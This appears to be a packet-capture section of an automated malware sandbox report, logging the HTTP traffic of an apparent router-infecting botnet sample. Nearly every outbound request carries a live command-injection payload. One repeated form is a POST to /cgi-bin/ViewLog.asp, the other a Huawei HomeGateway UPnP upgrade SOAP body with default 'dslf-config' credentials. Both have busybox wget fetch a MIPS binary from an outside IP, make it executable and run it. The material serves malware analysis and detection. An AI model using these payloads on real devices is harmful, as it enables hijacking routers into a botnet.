                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:20.390248060 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:22.310153008 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              804192.168.2.133705895.158.28.88080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.774029016 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              805192.168.2.133971262.29.71.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.780862093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              806192.168.2.1333908154.64.18.7723
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.807862997 CET207INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:18Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              807192.168.2.135373894.122.213.1548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.011120081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              808192.168.2.135957462.145.136.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.356167078 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.454154968 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.658957005 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:18:19 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              809192.168.2.133669631.136.202.958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.563906908 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.166147947 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.354137897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              810192.168.2.134465495.249.18.2418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.570219994 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.646151066 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.845597029 CET603INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:18:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Mx-ReqToken,X-Requested-With
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              811192.168.2.135974685.122.222.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.964684010 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              812192.168.2.133708295.158.28.88080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.195523977 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              813192.168.2.135967462.145.136.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.638742924 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.846564054 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:18:19 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
